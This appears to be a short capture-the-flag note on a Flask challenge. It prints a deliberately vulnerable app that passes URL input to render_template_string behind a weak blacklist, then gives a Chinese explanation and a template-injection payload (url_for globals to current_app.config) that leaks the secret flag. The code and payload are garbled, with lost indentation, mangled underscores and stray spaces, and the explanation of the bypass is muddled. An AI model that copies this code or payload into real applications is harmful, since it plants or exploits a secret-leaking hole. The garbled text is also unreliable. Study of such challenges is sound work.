import flask
import os
app = flask.Flask(__name__)
app.config['FLAG'] = os.environ.pop('FLAG')
@app.route('/')
def index():
return open(_file_).read()
@app.route('/shrine/<path: shrine>')
def shrine(shrine):
def safe_jinja(s):
s = s.replace('.','').replace(' ', '')
blacklist = ['config', 'self']
return ''.join([f'{% set {c}=None%}'.format(c) for c in blacklist]) + s
return flask.render_template_string(safe_jinja(shrine))
if __name__ == "__main__":
app.run(debug=True)
在flask.render_template_string()函数中,
传入{(url_ for._ globals. _ [' current. app'] .config)} 会优先被内置函数解析再使用shrine函数解析,
所以没有被过滤掉config,是一个解析时的函数优先级问题造成的SSTI漏洞